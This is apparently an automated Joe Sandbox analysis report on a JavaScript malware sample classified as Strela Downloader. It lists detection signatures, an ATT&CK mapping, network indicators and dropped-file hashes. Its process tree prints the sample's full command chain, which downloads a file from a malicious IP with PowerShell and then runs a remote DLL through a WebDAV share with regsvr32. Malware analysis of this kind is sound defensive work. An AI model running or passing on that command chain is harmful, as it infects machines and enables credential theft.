Windows
Analysis Report
1792532021822412669.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 6300 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\17925 3202182241 2669.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 4128 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user~1 \AppData\L ocal\Temp\ invoice.pd f http://1 93.143.1.2 05/invoice .php"&&sta rt C:\User s\user~1\A ppData\Loc al\Temp\in voice.pdf& &cmd /c ne t use \\19 3.143.1.20 5@8888\dav wwwroot\&& cmd /c reg svr32 /s \ \193.143.1 .205@8888\ davwwwroot \278411975 132181.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2868 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7052 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user~1\Ap pData\Loca l\Temp\inv oice.pdf h ttp://193. 143.1.205/ invoice.ph p" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 7496 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user ~1\AppData \Local\Tem p\invoice. pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 7744 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 8000 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=22 48 --field -trial-han dle=1520,i ,942505706 7997178605 ,165063159 4153861632 4,131072 - -disable-f eatures=Ba ckForwardC ache,Calcu lateNative WinOcclusi on,WinUseB rowserSpel lChecker / prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 7820 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: frack113, Nasreddine Bencherchali: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
7% | Virustotal | Browse | ||
8% | ReversingLabs | Script-JS.Trojan.StrelaStealer |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1588555 |
Start date and time: | 2025-01-11 02:20:35 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 53s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 25 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 1792532021822412669.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@28/61@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 184.28.88.176, 172.64.41.3, 162.159.61.3, 18.213.11.84, 54.224.241.105, 50.16.47.176, 34.237.241.83, 23.209.209.135, 199.232.214.172, 2.23.242.162, 2.16.168.107, 2.16.168.105, 184.28.90.27, 2.22.242.123, 2.22.242.11, 23.200.0.176, 23.200.0.196, 192.168.2.7, 13.107.246.45, 172.202.163.200, 23.203.104.175
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, time.windows.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
02:21:19 | Task Scheduler | |
20:21:30 | API Interceptor | |
20:21:35 | API Interceptor | |
20:21:36 | API Interceptor | |
20:21:44 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7066984179732022 |
Encrypted: | false |
SSDEEP: | 1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6VqZ:2JIB/wUKUKQncEmYRTwh0t |
MD5: | E826BE501875A302F88287117EDAB354 |
SHA1: | 41ABB865E0292CA66F2B14E5EA5E1BCDE7F35E0A |
SHA-256: | AB320189A16C1B790B192F24A57C37F11DC5ED51959BF7FA109415B7F60EFFE1 |
SHA-512: | 2DC9471B81908D0209DF5E88EC361C17BE2981AB60A79850DE8452FD651707FCE1402568BBEF59ED6076F39A73234689C9E0934178F0738921277336C5410E28 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7899754960598901 |
Encrypted: | false |
SSDEEP: | 1536:7SB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:7azaPvgurTd42UgSii |
MD5: | B36028CEFA0086047FB4E9605DC2FB55 |
SHA1: | 2E8263CB97ECB13022040C5C4AD3A704FB442A09 |
SHA-256: | 2B0FE66DB66C25491843F8197FAE88EA2F25B5435C084E2F2A2DB88E14BEBBDC |
SHA-512: | F54A5356B23947DA7333C8DEFD23AE5D2263F3788034D6D1E2BBCE5995DB685C11C4592823E3E76DD97BD17D0C0869559F2B0C50836FDD76E2F130F66A611861 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.08216274514660313 |
Encrypted: | false |
